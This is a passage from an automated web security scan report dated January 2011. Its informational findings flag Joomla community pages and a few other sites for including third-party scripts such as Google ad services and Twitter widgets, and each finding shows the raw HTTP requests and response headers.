Cookie: whoson=942-1294338785785; __utmz=108330077.1294765608.4.2.utmcsr=cdn.cloudscan.us|utmccn=(referral)|utmcmd=referral|utmcct=/redirect/; __utma=108330077.350499926.1294008031.1294765608.1294772434.5

Response

21.13. http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.w55c.net
Path:	/i/0Rw6qcLcmo_34070076.html

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N5875.270604.B3/B5111946.91;abr=!ie;sz=120x600;pc=[TPAS_ID];ord=[timestamp]?

Request

GET /i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl= HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ

Response

21.14. http://cherne.net/brian/resources/jquery.hoverIntent.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cherne.net
Path:	/brian/resources/jquery.hoverIntent.html

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/ga.js

Request

GET /brian/resources/jquery.hoverIntent.html HTTP/1.1
Host: cherne.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:30:40 GMT
Server: Apache
Last-Modified: Tue, 11 May 2010 02:34:12 GMT
ETag: "583c1ea-2ab4-486485c59d100"
Accept-Ranges: bytes
Content-Length: 10932
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...


<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

21.15. http://code.google.com/p/swfobject/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://code.google.com
Path:	/p/swfobject/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.gstatic.com/codesite/ph/3799605220899551948/js/core_scripts_20081103.js
http://www.gstatic.com/codesite/ph/3799605220899551948/js/prettify.js

Request

GET /p/swfobject/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.16. http://community.joomla.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://partner.googleadservices.com/gampad/google_service.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

Response

21.17. http://community.joomla.org/blogs/community.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/blogs/community.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://partner.googleadservices.com/gampad/google_service.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /blogs/community.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:22:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:22:47 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 180149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">

</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
...[SNIP]...

21.18. http://community.joomla.org/blogs/community/1390-jdaychile.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/blogs/community/1390-jdaychile.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://partner.googleadservices.com/gampad/google_service.js
http://platform.twitter.com/widgets.js
http://www.google.com/buzz/api/button.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /blogs/community/1390-jdaychile.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:22:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:22:50 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">

</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...

21.19. http://community.joomla.org/blogs/community/1392-joomla-day-chile-to-be-broadcast-live.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/blogs/community/1392-joomla-day-chile-to-be-broadcast-live.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://partner.googleadservices.com/gampad/google_service.js
http://platform.twitter.com/widgets.js
http://www.google.com/buzz/api/button.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /blogs/community/1392-joomla-day-chile-to-be-broadcast-live.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:22:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:22:49 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 168792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">

</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...

21.20. http://community.joomla.org/blogs/community/1398-joomladay-chile-2011-recap.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/blogs/community/1398-joomladay-chile-2011-recap.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://partner.googleadservices.com/gampad/google_service.js
http://platform.twitter.com/widgets.js
http://www.google.com/buzz/api/button.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /blogs/community/1398-joomladay-chile-2011-recap.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:22:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:22:49 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">

</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...

21.21. http://community.joomla.org/blogs/leadership/1389-joomla-16-arrives-thanks-for-a-job-well-done.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/blogs/leadership/1389-joomla-16-arrives-thanks-for-a-job-well-done.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://partner.googleadservices.com/gampad/google_service.js
http://platform.twitter.com/widgets.js
http://www.google.com/buzz/api/button.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /blogs/leadership/1389-joomla-16-arrives-thanks-for-a-job-well-done.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:22:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:22:55 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">

</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...

21.22. http://community.joomla.org/blogs/leadership/1391-joomla-16-presented-at-codemash.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/blogs/leadership/1391-joomla-16-presented-at-codemash.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://partner.googleadservices.com/gampad/google_service.js
http://platform.twitter.com/widgets.js
http://www.google.com/buzz/api/button.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /blogs/leadership/1391-joomla-16-presented-at-codemash.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:22:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:22:52 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">

</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...

21.23. http://community.joomla.org/blogs/leadership/1395-the-path-forward-migration-and-the-future.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/blogs/leadership/1395-the-path-forward-migration-and-the-future.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://partner.googleadservices.com/gampad/google_service.js
http://platform.twitter.com/widgets.js
http://www.google.com/buzz/api/button.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /blogs/leadership/1395-the-path-forward-migration-and-the-future.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:22:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:22:51 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">

</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...

21.24. http://community.joomla.org/connect.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/connect.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://partner.googleadservices.com/gampad/google_service.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /connect.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:23:23 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 55914

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">

</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
...[SNIP]...

21.25. http://community.joomla.org/connect/social.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/connect/social.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://friendfeed.com/embed/widget/joomla?v=2&num=30&hide_logo=1&hide_comments_likes=1&hide_subscribe=1
http://partner.googleadservices.com/gampad/google_service.js
http://platform.twitter.com/widgets.js
http://www.google.com/buzz/api/button.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /connect/social.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:24:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32050

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">

</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://friendfeed.com/embed/widget/joomla?v=2&num=30&hide_logo=1&hide_comments_likes=1&hide_subscribe=1"></script>
...[SNIP]...

21.26. http://community.joomla.org/events.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/events.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://partner.googleadservices.com/gampad/google_service.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /events.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:23:22 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">

</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
...[SNIP]...

21.27. http://community.joomla.org/events/34-event-news/1393-joomla-16-release-party-in-pune-india.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/events/34-event-news/1393-joomla-16-release-party-in-pune-india.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://partner.googleadservices.com/gampad/google_service.js
http://platform.twitter.com/widgets.js
http://www.google.com/buzz/api/button.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /events/34-event-news/1393-joomla-16-release-party-in-pune-india.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:23:32 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25732

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">

</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...

21.28. http://community.joomla.org/events/joomla-days/1343-joomla-day-chile-2011.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/events/joomla-days/1343-joomla-day-chile-2011.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://partner.googleadservices.com/gampad/google_service.js
http://platform.twitter.com/widgets.js
http://www.google.com/buzz/api/button.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /events/joomla-days/1343-joomla-day-chile-2011.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:23:29 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">

</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...

21.29. http://community.joomla.org/events/joomla-days/1394-joomladay-the-netherlands-2011.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/events/joomla-days/1394-joomladay-the-netherlands-2011.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://partner.googleadservices.com/gampad/google_service.js
http://platform.twitter.com/widgets.js
http://www.google.com/buzz/api/button.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /events/joomla-days/1394-joomladay-the-netherlands-2011.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
